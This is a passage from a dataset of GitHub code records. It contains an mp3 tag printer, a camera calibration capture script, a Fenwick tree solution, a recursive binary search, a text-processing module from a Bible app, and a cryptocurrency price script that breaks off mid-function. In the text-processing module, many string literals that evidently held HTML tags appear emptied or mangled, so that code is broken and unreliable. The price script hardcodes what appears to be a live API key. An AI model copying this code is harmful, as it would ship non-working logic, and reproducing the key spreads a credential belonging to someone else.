print(\"Album Type: {}\".format(tag.album_type))\n# print(\"Disc Num: {}\".format(tag.disc_num))\n# print(\"Artist Origin: {}\".format(tag.artist_origin))\n# print(\"# {}\".format('=' * 78))\n# print(\"Artist URL: {}\".format(tag.artist_url))\n# print(\"Audio File URL: {}\".format(tag.audio_file_url))\n# print(\"Audio Source URL: {}\".format(tag.audio_source_url))\n# print(\"Commercial URL: {}\".format(tag.commercial_url))\n# print(\"Copyright URL: {}\".format(tag.copyright_url))\n# print(\"Internet Radio URL: {}\".format(tag.internet_radio_url))\n# print(\"Publisher URL: {}\".format(tag.publisher_url))\n# print(\"Payment URL: {}\".format(tag.payment_url))\n# print(\"# {}\".format('=' * 78))\n# print(\"Publisher: {}\".format(tag.publisher))\n# print(\"Original Release Date: {}\".format(tag.original_release_date))\n# print(\"Play Count: {}\".format(tag.play_count))\n# print(\"Tagging Date: {}\".format(tag.tagging_date))\n# print(\"Release Date: {}\".format(tag.release_date))\n# print(\"Terms Of Use: {}\".format(tag.terms_of_use))\n# print(\"isV1: {}\".format(tag.isV1()))\n# print(\"isV2: {}\".format(tag.isV2()))\n# print(\"BPM: {}\".format(tag.bpm))\n# print(\"Cd Id: {}\".format(tag.cd_id))\n# print(\"Composer: {}\".format(tag.composer))\n# print(\"Encoding date: {}\".format(tag.encoding_date))\n# print(\"# {}\".format('=' * 78))\n# if tag.genre is not None : print(\"Genre: {}\".format(tag.genre.name))\n# if tag.non_std_genre is not None : print(\"Non Std Genre Name: {}\".format(tag.non_std_genre.name))\n# if tag.genre is not None : print(\"Genre ID: {}\".format(tag.genre.id))\n# if tag.non_std_genre is not None : print(\"Non Std Genre ID: {}\".format(tag.non_std_genre.id))\n# print(\"LAME Tag: {}\".format(a.info.lame_tag))\n# print(\"# {}\".format('=' * 78))\n# print(\"Header Version: {}\".format(tag.header.version))\n# print(\"Header Major Version: {}\".format(tag.header.major_version))\n# print(\"Header Minor Version: {}\".format(tag.header.minor_version))\n# print(\"Header Rev Version: {}\".format(tag.header.rev_version))\n# print(\"Header Extended: {}\".format(tag.header.extended))\n# print(\"Header Footer: {}\".format(tag.header.footer))\n# print(\"Header Experimental: {}\".format(tag.header.experimental))\n# print(\"Header SIZE: {}\".format(tag.header.SIZE))\n# print(\"Header Tag Size: {}\".format(tag.header.tag_size))\n# print(\"Extended Header Size: {}\".format(tag.extended_header.size))\n# print(\"# {}\".format('=' * 78))\n# print(\"File Name: {}\".format(tag.file_info.name))\n# print(\"File Tag Size: {}\".format(tag.file_info.tag_size))\n# print(\"File Tag Padding Size: {}\".format(tag.file_info.tag_padding_size))\n# print(\"File Read Only: {}\".format(tag.read_only))\n# print(\"File Size: {}\".format(a.info.size_bytes))\n# print(\"Last Modified: {}\".format(time.strftime('%Y-%m-%d %H:%M:%S',\n# time.localtime(tag.file_info.mtime))))\n# print(\"Last Accessed: {}\".format(time.strftime('%Y-%m-%d %H:%M:%S',\n# time.localtime(tag.file_info.atime))))\n# print(\"# {}\".format('=' * 78))\n#\n#\n# def duration_from_seconds(s):\n# \"\"\"Module to get the convert Seconds to a time like format.\"\"\"\n# s = s\n# m, s = divmod(s, 60)\n# h, m = divmod(m, 60)\n# d, h = divmod(h, 24)\n# timelapsed = \"{:01d}:{:02d}:{:02d}:{:02d}\".format(int(d),\n# int(h),\n# int(m),\n# int(s))\n# return timelapsed\n#\n# fileName = \"1.mp3\"\n# filePath = \"{}\\\\1.mp3\".format(pathlib.Path().absolute())\n#\n# track_info(fileName)\n#","repo_name":"freean2468/project_mp3loud","sub_path":"python/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43628428125","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport cv2\nimport shutil\n\n\nif __name__ == '__main__':\n camera = cv2.VideoCapture(int(sys.argv[1]))\n camera.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\n camera.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\n\n cv2.namedWindow(\"Frames for calibration\")\n\n if os.path.exists('calibration_res'):\n shutil.rmtree('calibration_res')\n os.makedirs('calibration_res')\n\n snapshot_counter = 0\n print('Press space to capture an image')\n while True:\n ret, frame = camera.read()\n if not ret:\n print(\"Failed to grab frame\")\n break\n\n cv2.imshow(\"Frames for calibration\", frame)\n\n k = cv2.waitKey(10)\n if k % 256 == 27:\n break\n elif k % 256 == 32:\n filename = 'calibration_res/calibration_frame_{}.png'.format(\n snapshot_counter)\n cv2.imwrite(filename, frame)\n print('File {} saved.'.format(filename))\n snapshot_counter += 1\n","repo_name":"hibetterheyj/EPFL_ROS_Practicals_Project","sub_path":"src/ros_basics_vision/calibration/capture_calibration_pictures.py","file_name":"capture_calibration_pictures.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"31648316688","text":"# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# import sys\n# read = sys.stdin.buffer.read\n# readline = sys.stdin.buffer.readline\n# readlines = sys.stdin.buffer.readlines\n\n# 検討?分 実装分 バグとり分\n\nimport sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nclass fenwick_tree():\n def __init__(self, n:int, mod:int = 0):\n self.__mod = mod\n self.__n = n\n self.__data = [0] * self.__n\n\n def add(self, p:int, x:int):\n assert (0 <= p) & (p < self.__n)\n if(self.__mod == 0):\n self.__add_mod0(p,x)\n else:\n self.__add_mod(p,x)\n\n def __add_mod0(self, p:int, x:int):\n p+=1\n while( p<= self.__n):\n self.__data[p-1] += x\n p += p & -p\n\n def __add_mod(self, p:int, x:int):\n p+=1\n while( p<= self.__n):\n self.__data[p-1] += x\n self.__data[p-1] %= self.__mod\n p += p & -p\n\n def sum(self, l:int, r:int):\n assert (0 <= l) & (l <= r) & (r <= self.__n)\n if(self.__mod == 0):\n return self.__sum_mod0(r) - self.__sum_mod0(l)\n else:\n return self.__sum_mod(r) - self.__sum_mod(l)\n\n def __sum_mod0(self, r:int):\n s = 0\n while(r > 0):\n s += self.__data[r-1]\n r -= r & -r\n return s\n\n def __sum_mod(self, r:int):\n s = 0\n while(r > 0):\n s += self.__data[r-1]\n s %= self.__mod\n r -= r & -r\n return s\n\nimport sys\nread = sys.stdin.buffer.read\nreadline = sys.stdin.buffer.readline\nreadlines = sys.stdin.buffer.readlines\n\nn,q = map(int,readline().split())\na = list(map(int,readline().split()))\nquery = list(map(int,read().split()))\n\nft = fenwick_tree(n,mod=10**18)\nans = []\n\nfor i,ai in enumerate(a):\n ft.add(i,ai)\n\ni = 0\nfor _ in range(q):\n if(query[i]==0):\n p,x = query[i+1:i+3]\n ft.add(p,x)\n else:\n l,r = query[i+1:i+3]\n ans.append(ft.sum(l,r))\n i += 3\n\nprint('\\n'.join(map(str,ans)))\n","repo_name":"komajun365/competitive_programming","sub_path":"others/practice2_old/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26623654998","text":"#this is another way of implementing binary search in a recursive form\n\n\ndef recursive_binary_search(list, target):\n if len(list) == 0:\n return False\n else:\n midpoint = len(list) // 2\n if list[midpoint] == target:\n return True\n else:\n if target > list[midpoint]:\n return recursive_binary_search(list[midpoint +1 :] , target)\n else:\n return recursive_binary_search(list[:midpoint] , target)\n \n\ndef verify(result):\n if result == True:\n print(f'the target was found... : ) : {result}')\n else:\n print(f'the target was not found... : ( : {result}')\n\nrandom_numbers = [12, 45, 67, 23, 56, 78, 34, 89, 10, 42]\nsorted_list = sorted(random_numbers)\n\nfirst_target = 56\nsecond_target = 80\n\nresult = recursive_binary_search(sorted_list, first_target)\nverify(result)\n\nresult = recursive_binary_search(sorted_list, second_target)\nverify(result)","repo_name":"Felix221123/python_projects","sub_path":"recursive_binary_search.py","file_name":"recursive_binary_search.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6405824815","text":"import re, html, base64, os, config\nfrom util.BibleVerseParser import BibleVerseParser\nimport urllib.parse\ntry:\n import html_text\n isHtmlTextInstalled = True\nexcept:\n isHtmlTextInstalled = False\n\ntry:\n from bs4 import BeautifulSoup\n import html5lib\n isBeautifulsoup4Installed = True\nexcept:\n isBeautifulsoup4Installed = False\n\nclass TextUtil:\n\n @staticmethod\n def formatConfigLabel(text):\n text = re.sub(\"([a-z])([A-Z])\", r\"\\1 \\2\", text)\n words = text.split(\" \")\n words[0] = words[0].capitalize()\n return \" \".join(words)\n\n @staticmethod\n def getQueryPrefix():\n return \"PRAGMA case_sensitive_like = {0}; \".format(\"true\" if config.enableCaseSensitiveSearch else \"false\")\n\n @staticmethod\n def regexp(expr, item):\n reg = re.compile(expr, flags=0 if config.enableCaseSensitiveSearch else re.IGNORECASE)\n #return reg.match(item) is not None\n return reg.search(item) is not None\n\n @staticmethod\n def highlightSearchString(text, searchString):\n if searchString == \"z\":\n return text\n if config.enableCaseSensitiveSearch:\n return re.sub(\"({0})\".format(searchString), r\"\\1\", text, flags=0)\n else:\n return re.sub(\"({0})\".format(searchString), r\"\\1\", text, flags=re.IGNORECASE)\n\n @staticmethod\n # a fallback method when Prompt_toolkit formatted text does not work\n def convertHtmlTagToColorama(text):\n \"\"\"\"\n # prompt-toolkit ansi color names\n config.terminalColors = {\n \"ansidefault\": \"ansidefault\",\n \"ansiblack\": \"ansiwhite\",\n \"ansired\": \"ansibrightred\",\n \"ansigreen\": \"ansibrightgreen\",\n \"ansiyellow\": \"ansibrightyellow\",\n \"ansiblue\": \"ansibrightblue\",\n \"ansimagenta\": \"ansibrightmagenta\",\n \"ansicyan\": \"ansibrightcyan\",\n \"ansigray\": \"ansibrightblack\",\n \"ansiwhite\": \"ansiblack\",\n \"ansibrightred\": \"ansired\",\n \"ansibrightgreen\": \"ansigreen\",\n \"ansibrightyellow\": \"ansiyellow\",\n \"ansibrightblue\": \"ansiblue\",\n \"ansibrightmagenta\": \"ansimagenta\",\n \"ansibrightcyan\": \"ansicyan\",\n \"ansibrightblack\": \"ansigray\",\n }\n \"\"\"\n # Reference: https://github.com/tartley/colorama/blob/master/colorama/ansi.py\n # standard colours: \"RESET\", \"BLACK\", \"WHITE\", \"RED\", \"GREEN\", \"YELLOW\", \"BLUE\", \"MAGENTA\", \"CYAN\"\n # extended colours: \"LIGHTBLACK_EX\", \"LIGHTRED_EX\", \"LIGHTGREEN_EX\", \"LIGHTYELLOW_EX\", \"LIGHTBLUE_EX\", \"LIGHTMAGENTA_EX\", \"LIGHTCYAN_EX\", \"LIGHTWHITE_EX\"\n if (\"Colorama\" in config.enabled):\n from colorama import Fore, Back, Style\n\n searchReplace = (\n (\"\", \"\\033[1m\"),\n (\"\", \"\\033[3m\"),\n (\"\", \"\\033[4m\"),\n (\"\", \"\\033[0m\"),\n (\"\", \"\\033[0m\"),\n (\"\", \"\\033[0m\"),\n )\n for search, replace in searchReplace:\n text = text.replace(search, replace)\n\n searchReplace = (\n (\"]+?>\", Fore.RESET),\n (\"|\", Style.RESET_ALL),\n (\"\"\"]*?)\" bg=\"([^<>]*?)\">\"\"\", r\"<\\1> \"),\n\n (\"\", Fore.RESET),\n\n (\"\", Fore.BLACK),\n (\"\", Fore.RED),\n (\"\", Fore.GREEN),\n (\"\", Fore.YELLOW),\n (\"\", Fore.BLUE),\n (\"\", Fore.MAGENTA),\n (\"\", Fore.CYAN),\n (\"\", Fore.WHITE),\n (\"\", Fore.WHITE),\n\n (\"\", Fore.LIGHTBLACK_EX),\n (\"\", Fore.LIGHTRED_EX),\n (\"\", Fore.LIGHTGREEN_EX),\n (\"\", Fore.LIGHTYELLOW_EX),\n (\"\", Fore.LIGHTBLUE_EX),\n (\"\", Fore.LIGHTMAGENTA_EX),\n (\"\", Fore.LIGHTCYAN_EX),\n\n (\"\", Back.RESET),\n\n (\"\", Back.BLACK),\n (\"\", Back.RED),\n (\"\", Back.GREEN),\n (\"\", Back.YELLOW),\n (\"\", Back.BLUE),\n (\"\", Back.MAGENTA),\n (\"\", Back.CYAN),\n (\"\", Back.WHITE),\n (\"\", Back.WHITE),\n\n (\"\", Back.LIGHTBLACK_EX),\n (\"\", Back.LIGHTRED_EX),\n (\"\", Back.LIGHTGREEN_EX),\n (\"\", Back.LIGHTYELLOW_EX),\n (\"\", Back.LIGHTBLUE_EX),\n (\"\", Back.LIGHTMAGENTA_EX),\n (\"\", Back.LIGHTCYAN_EX),\n\n (\"<[^<>]*?>\", \"\"),\n )\n for search, replace in searchReplace:\n text = re.sub(search, replace, text)\n else:\n text = re.sub(\"<[^<>]*?>\", \"\", text)\n\n return text\n\n @staticmethod\n def colourTerminalText(text):\n searchReplace = (\n #(\"(|||)\", r\"「{0}」\".format(config.terminalHeadingTextColor)),\n #(\"(||)\", r\"「/{0}」\".format(config.terminalHeadingTextColor)),\n # make sure tags are paired\n (\"()(.*?)()\", r\"\\1「{0}」\\2「/{0}」\\3\".format(config.terminalHeadingTextColor)),\n (\"(||)(.*?)(|)\", r\"\\1「{0}」\\2「/{0}」\\3\".format(config.terminalHeadingTextColor)),\n #(\"(|||||)\", r\"「{0}」\".format(config.terminalResourceLinkColor)),\n #(\"(||)\", r\"「/{0}」\".format(config.terminalResourceLinkColor)),\n (\"(|)(.*?)()\", r\"\\1「{0}」\\2「/{0}」\\3\".format(config.terminalResourceLinkColor)),\n (\"(|)(.*?)()\", r\"\\1「b」「{0}」\\2「/{0}」「/b」\\3\".format(config.terminalResourceLinkColor)),\n (\"(|)(.*?)()\", r\"\\1「{0}」\\2「/{0}」\\3\".format(config.terminalResourceLinkColor)),\n #(\"()\", r\"「{0}」\".format(config.terminalVerseNumberColor)),\n #(\"()\", r\"「/{0}」\".format(config.terminalVerseNumberColor)),\n (\"(|)(.*?)()\", r\"\\1「{0}」\\2「/{0}」\\3\".format(config.terminalResourceLinkColor)),\n #(\"\", \"\"\"「tmsh fg=\"{1}\" bg=\"{0}\"」\"\"\".format(config.terminalSearchHighlightBackground, config.terminalSearchHighlightForeground)),\n #(\"\", \"「/tmsh」\"),\n (\"()(.*?)()\", r\"\"\"\\1「tmsh fg=\"{1}\" bg=\"{0}\"」\\2「/tmsh」\\3\"\"\".format(config.terminalSearchHighlightBackground, config.terminalSearchHighlightForeground)),\n # basic html\n (\"<(b|u|i)>\", r\"「\\1」\"),\n (\"\", r\"「/\\1」\"),\n )\n for search, replace in searchReplace:\n text = re.sub(search, replace, text)\n return text\n\n @staticmethod\n def htmlToPlainText(content, colours=True):\n content = content.replace(\"
\", \"
--------------------
\")\n if config.runMode == \"terminal\":\n content = re.sub(r\"\"\"\\1\"\"\", r\"[\\1 ] \", content)\n content = re.sub(\"\"\"(]*?onclick=\"luW\\([0-9]+?,')([0-9]+?)('[^<>]*?>)\"\"\", r\"[\\3 ]\\1\\2\\3\\4\", content)\n content = re.sub(\"\"\"(]+?\\(')([^<>]+?)('\\)\">)\"\"\", r\"[\\2 ] \", content)\n # Format text colours\n if config.runMode == \"terminal\" and colours:\n content = TextUtil.colourTerminalText(content)\n # cconvert text\n if isHtmlTextInstalled:\n content = html_text.extract_text(content)\n elif isBeautifulsoup4Installed:\n content = re.sub(\"(|)\", r\"\\1 \", content)\n content = re.sub(\"(
|
|)\", r\"\\1\\n\", content)\n content = re.sub(\"(|

||
)\", r\"\\1\\n\\n\", content)\n content = BeautifulSoup(content, \"html5lib\").get_text()\n else:\n content = re.sub(\"
|
\", \"\\n\", content)\n content = re.sub('<[^<]+?>', '', content)\n if config.runMode == \"terminal\" and not colours:\n content = re.sub(\"\"\"「ansi[^「」]+?」|「tm[a-z][a-z] fg=\"[^「」]*?\" bg=\"[^「」]*?\"」|「/tm[a-z][a-z]」\"\"\", \"\", content)\n elif config.runMode == \"terminal\" and colours:\n searchReplace = (\n (\"「ansiblack」\", \"\"),\n (\"「ansired」\", \"\"),\n (\"「ansigreen」\", \"\"),\n (\"「ansiyellow」\", \"\"),\n (\"「ansiblue」\", \"\"),\n (\"「ansimagenta」\", \"\"),\n (\"「ansicyan」\", \"\"),\n (\"「ansigray」\", \"\"),\n (\"「ansiwhite」\", \"\"),\n (\"「ansibrightred」\", \"\"),\n (\"「ansibrightgreen」\", \"\"),\n (\"「ansibrightyellow」\", \"\"),\n (\"「ansibrightblue」\", \"\"),\n (\"「ansibrightmagenta」\", \"\"),\n (\"「ansibrightcyan」\", \"\"),\n (\"「ansibrightblack」\", \"\"),\n (\"「/ansiblack」\", \"\"),\n (\"「/ansired」\", \"
\"),\n (\"「/ansigreen」\", \"\"),\n (\"「/ansiyellow」\", \"\"),\n (\"「/ansiblue」\", \"\"),\n (\"「/ansimagenta」\", \"\"),\n (\"「/ansicyan」\", \"\"),\n (\"「/ansigray」\", \"\"),\n (\"「/ansiwhite」\", \"\"),\n (\"「/ansibrightred」\", \"\"),\n (\"「/ansibrightgreen」\", \"\"),\n (\"「/ansibrightyellow」\", \"\"),\n (\"「/ansibrightblue」\", \"\"),\n (\"「/ansibrightmagenta」\", \"\"),\n (\"「/ansibrightcyan」\", \"\"),\n (\"「/ansibrightblack」\", \"\"),\n (\"\"\"「(tm[a-z][a-z] fg=\"[^「」]*?\" bg=\"[^「」]*?\")」\"\"\", r\"<\\1>\"),\n (\"「(/tm[a-z][a-z])」\", r\"<\\1>\"),\n (\"「(b|u|i)」\", r\"<\\1>\"),\n (\"「/(b|u|i)」\", r\"\"),\n #(\"[ ]*「Fore.RESET」\", Fore.RESET),\n #(\"[ ]*「Back.RESET」\", Back.RESET),\n #(\"[ ]*「Style.RESET_ALL」\", Style.RESET_ALL),\n )\n for search, replace in searchReplace:\n content = re.sub(search, replace, content)\n\n searchReplace = (\n (\" audiotrack\", \"\"),\n (\" [ ]+?([^ ])\", r\" \\1\"),\n )\n for search, replace in searchReplace:\n content = re.sub(search, replace, content)\n # fine tune\n if config.runMode == \"terminal\":\n content = re.sub(r\"\"\"(G[0-9]+?)'\\)\" class=\"G\\1\" onmouseover=\"ld\\('\\1'\\); hl1\\('','','\\1'\\)\" onmouseout=\"hl0\\('','','\\1\"\"\", r\"\\1\", content)\n return content\n\n @staticmethod\n def imageToText(filepath):\n fileBasename = os.path.basename(filepath)\n *_, fileExtension = os.path.splitext(fileBasename)\n if fileExtension.lower() in (\".png\", \".jpg\", \".jpeg\", \".bmp\", \".gif\"):\n # read a binary file\n with open(filepath, \"rb\") as fileObject:\n binaryData = fileObject.read()\n encodedData = base64.b64encode(binaryData)\n binaryString = encodedData.decode(\"ascii\")\n htmlTag = '\"{1}\"'.format(binaryString, fileBasename, fileExtension[1:])\n return htmlTag\n else:\n return \"[File type not supported!]\"\n\n @staticmethod\n def formulateUBACommandHyperlink(text):\n # Create hyperlink to UBA command\n # work on text formatted like ***[CROSSREFERENCE:::John 3:16@An hyperlink link to open cross-references of John 3:16]\n return re.sub(\"\\*\\*\\*\\[([^'{0}]*?)@([^'{0}]*?)\\]\".format('\"\\*\\[\\]@'), r\"\\2\".format('\"'), text)\n\n @staticmethod\n def fixTextHighlighting(text):\n # fix searching LXX / SBLGNT words\n text = re.sub(r\"([LS][0-9]+?)'\\)\"'\"'\">(.*?)\", r\"\\1'\\)\"'\"'r\">\\2\", text)\n # remove misplacement of tags & \n p = re.compile(\"(<[^<>]*?)(.*?)\", flags=re.M)\n s = p.search(text)\n while s:\n text = re.sub(p, r\"\\1\\2\", text)\n s = p.search(text)\n return text\n\n @staticmethod\n def plainTextToUrl(text):\n # https://wiki.python.org/moin/EscapingHtml\n text = html.escape(text)\n searchReplace = (\n (\" \", \"%20\"),\n (\"\\n\", \"%0D%0A\"),\n )\n for search, replace in searchReplace:\n text = text.replace(search, replace)\n return text\n\n # Return digits from a string\n @staticmethod\n def getDigits(text):\n return ''.join(c for c in text if c.isdigit())\n\n # Generate a web link for sharing\n @staticmethod\n def getWeblink(command, server=\"\"):\n # https://stackoverflow.com/questions/40557606/how-to-url-encode-in-python-3\n command = urllib.parse.quote(command)\n htmlPages = {\n \"ENG\": \"index.html\",\n \"TC\": \"traditional.html\",\n \"SC\": \"simplified.html\",\n }\n htmlPage = \"\" if config.webUBAServer.endswith(\".html\") and not server else \"/{0}\".format(htmlPages.get(htmlPages[config.standardAbbreviation], \"index.html\"))\n return \"{0}{1}?cmd={2}\".format(server if server else config.webUBAServer, htmlPage, command)\n\n # Remove Hebrew vowels or Greek accents\n @staticmethod\n def removeVowelAccent(text):\n searchReplace = (\n (r\"[\\֑\\֒\\֓\\֔\\֕\\֖\\֗\\֘\\֙\\֚\\֛\\֜\\֝\\֞\\֟\\֠\\֡\\֣\\֤\\֥\\֦\\֧\\֨\\֩\\֪\\֫\\֬\\֭\\֮\\ֽ\\ׄ\\ׅ\\‍\\‪\\‬\\̣\\ְ\\ֱ\\ֲ\\ֳ\\ִ\\ֵ\\ֶ\\ַ\\ָ\\ֹ\\ֺ\\ֻ\\ׂ\\ׁ\\ּ\\ֿ\\־\\׀\\׆]\", \"\"),\n (\"[שׂשׁ]\", \"ש\"),\n (\"[ἀἄᾄἂἆἁἅᾅἃάᾴὰᾶᾷᾳ]\", \"α\"),\n (\"[ἈἌἎἉἍἋ]\", \"Α\"),\n (\"[ἐἔἑἕἓέὲ]\", \"ε\"),\n (\"[ἘἜἙἝἛ]\", \"Ε\"),\n (\"[ἠἤᾔἢἦᾖᾐἡἥἣἧᾗᾑήῄὴῆῇῃ]\", \"η\"),\n (\"[ἨἬἪἮἩἭἫ]\", \"Η\"),\n (\"[ἰἴἶἱἵἳἷίὶῖϊΐῒ]\", \"ι\"),\n (\"[ἸἼἹἽ]\", \"Ι\"),\n (\"[ὀὄὂὁὅὃόὸ]\", \"ο\"),\n (\"[ὈὌὉὍὋ]\", \"Ο\"),\n (\"[ῥ]\", \"ρ\"),\n (\"[Ῥ]\", \"Ρ\"),\n (\"[ὐὔὒὖὑὕὓὗύὺῦϋΰῢ]\", \"υ\"),\n (\"[ὙὝὟ]\", \"Υ\"),\n (\"[ὠὤὢὦᾠὡὥὧᾧώῴὼῶῷῳ]\", \"ω\"),\n (\"[ὨὬὪὮὩὭὯ]\", \"Ω\"),\n )\n for search, replace in searchReplace:\n text = re.sub(search, replace, text)\n return text\n\n # fix note font display\n @staticmethod\n def fixNoteFontDisplay(content):\n if config.overwriteNoteFont:\n content = re.sub(\"font-family:[^<>]*?([;'{0}])\".format('\"'), r\"font-family:{0}\\1\".format(config.font),\n content)\n if config.overwriteNoteFontSize:\n content = re.sub(\"font-size:[^<>]*?;\", \"\", content)\n return content\n\n # fix note font display\n @staticmethod\n def fixNoteFont(note):\n note = re.sub(\"\\n\"\"\", \"\", note)\n return note\n\n # wrap with html\n @staticmethod\n def htmlWrapper(text, parsing=False, view=\"study\", linebreak=True, html=True):\n searchReplace1 = (\n (\"\\r\\n|\\r|\\n\", \"
\"),\n (\"\\t\", \"  \"),\n )\n searchReplace2 = (\n (\"
(|
    |
      )\", r\"\\1\"),\n (\"(
||)
\", r\"\\1\"),\n (\"]*?href=['{0}]([^\\n<>]*?)['{0}][^\\n<>]*?>\".format('\"'),\n r\"\".format('\"')),\n (\"onclick='website\\({0}([^\\n<>]*?).uba{0}\\)'\".format('\"'), r\"onclick='uba({0}\\1.uba{0})'\".format('\"'))\n )\n if linebreak:\n for search, replace in searchReplace1:\n text = re.sub(search, replace, text)\n if html:\n for search, replace in searchReplace2:\n text = re.sub(search, replace, text)\n if parsing:\n # Export inline images to external files, so as to improve parsing performance. \n text = TextUtil.exportAllImages(text)\n text = TextUtil.formulateUBACommandHyperlink(text)\n text = BibleVerseParser(config.parserStandarisation).parseText(text)\n if not \"UniqueBible.app\" in text:\n text = TextUtil.wrapHtml(text, view)\n return text\n\n # export images\n @staticmethod\n def exportAllImages(htmlText):\n config.exportImageNumber = 0\n searchPattern = r'src=([\"{0}])data:image/([^<>]+?);[ ]*?base64,[ ]*?([^ <>]+?)\\1'.format(\"'\")\n htmlText = re.sub(searchPattern, TextUtil.exportAnImage, htmlText)\n return htmlText\n\n @staticmethod\n def exportAnImage(match):\n exportFolder = os.path.join(\"htmlResources\", \"images\", \"export\")\n if not os.path.isdir(exportFolder):\n os.makedirs(exportFolder)\n quotationMark, ext, asciiString = match.groups()\n # Note the difference between \"groups\" and \"group\"\n # wholeString = match.group(0)\n # quotationMark = match.group(1)\n # ext = match.group(2)\n # asciiString = match.group(3)\n config.exportImageNumber += 1\n binaryString = asciiString.encode(\"ascii\")\n binaryData = base64.b64decode(binaryString)\n imageFilename = \"tab{0}_image{1}.{2}\".format(100, config.exportImageNumber, ext)\n exportPath = os.path.join(exportFolder, imageFilename)\n with open(exportPath, \"wb\") as fileObject2:\n fileObject2.write(binaryData)\n return \"src={0}images/export/{1}{0}\".format(quotationMark, imageFilename)\n\n # wrap with html 2\n @staticmethod\n def wrapHtml(content, view=\"\", book=False):\n fontFamily = config.font\n fontSize = \"{0}px\".format(config.fontSize)\n if book:\n if config.overwriteBookFontFamily:\n fontFamily = config.overwriteBookFontFamily\n if config.overwriteBookFontSize:\n if type(config.overwriteBookFontSize) == str:\n fontSize = config.overwriteBookFontSize\n elif type(config.overwriteBookFontSize) == int:\n fontSize = \"{0}px\".format(config.overwriteBookFontSize)\n bcv = (config.studyText, config.studyB, config.studyC, config.studyV) if view == \"study\" else (config.mainText, config.mainB, config.mainC, config.mainV)\n activeBCVsettings = \"\".format(*bcv)\n html = (\"\"\"UniqueBible.app\n \n \n \n \n \"\"\"\n \"\"\n \"\"\n \"\"\n \"\"\n \"\"\n \"\"\n \"\"\n \"\"\"\"\"\"\n \"{0}\"\n \"\"\"\"\"\"\n \"\"\n \"{1}\"\n \"

 

\"\n ).format(activeBCVsettings,\n content,\n \"{\",\n \"}\",\n fontSize,\n fontFamily,\n config.fontChinese,\n config.theme,\n TextUtil.getHighlightCss(),\n config.webUBAIcon,\n config.widgetBackgroundColor,\n config.widgetForegroundColor,\n )\n return html\n\n # get highlight css\n @staticmethod\n def getHighlightCss():\n css = \"\"\n for i in range(len(config.highlightCollections)):\n code = \"hl{0}\".format(i + 1)\n css += \".{2} {0} background: {3}; {1} \".format(\"{\", \"}\", code, config.highlightDarkThemeColours[i] if config.theme == \"dark\" else config.highlightLightThemeColours[i])\n return css\n\n # Remove special characters\n @staticmethod\n def removeSpecialCharacters(text):\n searchReplace = (\n (r\"[\\-\\—\\,\\;\\:\\\\\\?\\.\\·\\·\\‘\\’\\‹\\›\\“\\”\\«\\»\\(\\)\\[\\]\\{\\}\\⧼\\⧽\\〈\\〉\\*\\‿\\᾽\\⇔\\¦]\", \"\"),\n )\n for search, replace in searchReplace:\n text = re.sub(search, replace, text)\n return text\n\n\nif __name__ == '__main__':\n\n print(TextUtil.getDigits(\"abc123def\"))\n","repo_name":"eliranwong/UniqueBible","sub_path":"util/TextUtil.py","file_name":"TextUtil.py","file_ext":"py","file_size_in_byte":23927,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"53"} +{"seq_id":"13411986199","text":"from requests import Session\nimport json\n\n# This is a test\n# This is another test line\n\nquotes_latest_url = 'https://pro-api.coinmarketcap.com/v1/cryptocurrency/quotes/latest' # The URL to the Coin Market Cap latest quotes database\n\nheaders = {\n \"Accepts\": \"application/json\",\n \"X-CMC_PRO_API_KEY\": \"099b0231-cdb1-482b-8921-4b95af9590fa\"\n}\n\nsession = Session()\nsession.headers.update(headers)\n\ncryptoID = {'btc': '1', 'eth': '1027', 'ada': '2010', 'xrp': '52', 'ltc': '2', 'xlm': '512', 'bnb': '1839', 'doge': '74', 'usdt': '825'} # Contains each crypto name ID paired with their id within the API\ndataNames = [\"last_updated\", \"market_cap\", \"percent_change_1h\", \"percent_change_24h\", \"percent_change_7d\", \"percent_change_30d\", \"percent_change_60d\", \"percent_change_90d\", \"volume_24h\", \"price\"] # List of all the supported types of data that the user can access about a particular crypto\n\n# General Description\n# Gets the price data of crypto currencies supported by the \"Coin Market Cap API\"\n#\n# Parameters\n# (type) crypto type such as \"btc\", \"eth\", \"ada\", etc\n# (data_name) the data in which the user wants, such as \"price\", \"last_updated\", \"percent_change_1h\", etc\n#\ndef getLatestData(type, data_name):\n data_name = data_name.lower()\n type = type.lower()\n crypto_param = get_param(type) # Assigns a dictionary of the corresponding crypto and currency type4\n\n response = session.get(quotes_latest_url, params=crypto_param)\n\n # Checks if the data_name variable is a correct type of data supported by the API\n #if data_name not in dataNames:\n #print(\"Incorrect data type \\\"{}\\\". \\nUsage: \".format(data_name), end=\" \")\n #for name in dataNames:\n #print(\"\\\"{}\\\"\".format(name), end=\" \")\n #return -1\n \n if data_name not in dataNames:\n return -1\n if type not in cryptoID:\n return -2\n\n for name in dataNames:\n if data_name == name:\n return json.loads(response.text)['data'][cryptoID[type]]['quote']['USD'][name] # Pulls the desired information from the json data supplied by the API\n\n\ndef listSupportedCryptoCurrencies():\n myList = []\n for id in cryptoID:\n myList.append(id)\n return myList\n\n\n# General Description\n# Returns the correct dictionary corresponding to the type provided.\n#\n# Parameter\n# (Type) A string that is the symbol of the corresponding crypto currency I.E 'btc', 'eth', 'ada' , etc\ndef get_param(type):\n if type == 'btc':\n btc_param = {\n \"slug\": \"bitcoin\",\n \"convert\": \"USD\"\n }\n return btc_param\n elif type == 'eth':\n eth_param = {\n \"slug\": \"ethereum\",\n \"convert\": \"USD\"\n }\n return eth_param\n elif type == 'ada':\n ada_param = {\n \"slug\": \"cardano\",\n \"convert\": \"USD\"\n }\n return ada_param\n elif type == 